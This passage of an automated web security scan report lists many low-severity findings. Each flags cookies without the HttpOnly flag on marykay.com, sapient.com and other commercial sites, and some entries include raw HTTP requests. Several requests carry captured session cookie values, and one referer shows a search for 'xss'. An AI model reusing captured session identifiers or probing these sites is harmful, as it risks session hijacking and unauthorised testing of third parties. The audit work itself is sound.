Confidence:	Certain
Host:	http://www.marykay.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.216. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.217. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.218. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.219. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.220. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Common/SiteCatalyst/marykaycom/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.221. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/245_eyeColorBundle.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.222. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/254_makeUpArtistLooks.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:46:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.223. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/324m_shopYourWay.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.224. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/330m_%20FallTrend_eng.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.225. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/373_TWNightCmpx.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.226. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/502_mascaraWardrobe.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.227. http://www.marykay.com/Content/HPflash/502_moc.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/502_moc.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.228. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/BoaB_miniAd.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.229. http://www.marykay.com/IMAGES/bkgLong.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/IMAGES/bkgLong.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.230. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Checkout/viewbag/btn_x.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.231. http://www.marykay.com/Images/Site/FooterBack1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/FooterBack1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.232. http://www.marykay.com/Images/Site/hdottedline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/hdottedline.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.233. http://www.marykay.com/Images/Site/searchbox.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/searchbox.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.234. http://www.marykay.com/Images/Site/vdottedline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/vdottedline.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.235. http://www.marykay.com/Images/Site/wholeheader.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/wholeheader.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.236. http://www.marykay.com/JS/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/JS/swfobject.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.237. http://www.marykay.com/Menu.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Menu.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.238. http://www.marykay.com/Scripts/HeaderScript.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Scripts/HeaderScript.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.239. http://www.marykay.com/Scripts/jquery-1.4.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Scripts/jquery-1.4.2.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.240. http://www.marykay.com/Styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Styles.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.241. http://www.marykay.com/Styles_US.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Styles_US.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.242. http://www.marykay.com/Themes/TabMenu/US/tabs.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Themes/TabMenu/US/tabs.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.243. http://www.marykay.com/Themes/TabMenu/tabs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Themes/TabMenu/tabs.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.244. http://www.marykay.com/content/HPflash/portfolio_mk.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/content/HPflash/portfolio_mk.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.245. http://www.marykay.com/content/hpflash/stage.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/content/hpflash/stage.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.246. http://www.marykay.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ConsultantContactID=-9223372036854775808; path=/
TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.247. http://www.marykay.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.248. http://www.marykay.com/images/fflogo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/fflogo.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.249. http://www.marykay.com/images/icn_ec.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_ec.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.250. http://www.marykay.com/images/icn_fb.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_fb.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.251. http://www.marykay.com/images/icn_pbp.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_pbp.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.252. http://www.marykay.com/images/icn_vmo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_vmo.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.253. http://www.marykay.com/images/icn_yt.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_yt.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.254. http://www.marykay.com/images/ielogo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/ielogo.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.255. http://www.marykay.com/images/searchbutton.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/searchbutton.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.256. http://www.marykay.com/scripts/i2a.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/scripts/i2a.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com
www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.257. http://www.sapient.com/en-us/about-sapient/alliances.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/about-sapient/alliances.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

locale=en-us; expires=Fri, 16-Sep-2011 15:37:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/about-sapient/alliances.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html?search=xss%20contact%20faq%20phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.4.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

13.258. http://www.sapient.com/en-us/about-sapient/alliances/atg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/about-sapient/alliances/atg.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

locale=en-us; expires=Fri, 16-Sep-2011 15:32:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/about-sapient/alliances/atg.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

13.259. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/about-sapient/corporate-social-responsibility.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

locale=en-us; expires=Fri, 16-Sep-2011 15:35:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/about-sapient/corporate-social-responsibility.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/alliances/atg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; locale=en-us; rootItemAlias=SapientNitro; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.1.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; sifrFetch=true

Response

13.260. http://www.sapient.com/en-us/search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

locale=en-us; expires=Fri, 16-Sep-2011 15:37:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/search.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.2.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

13.261. http://www.tenzing.com/atg-ecommerce-hosting.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/atg-ecommerce-hosting.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

13.262. http://www2.znode.com/analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.znode.com
Path:	/analytics

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pi_opt_in1852=2d4456d0e1929f239244e44b; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/
visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

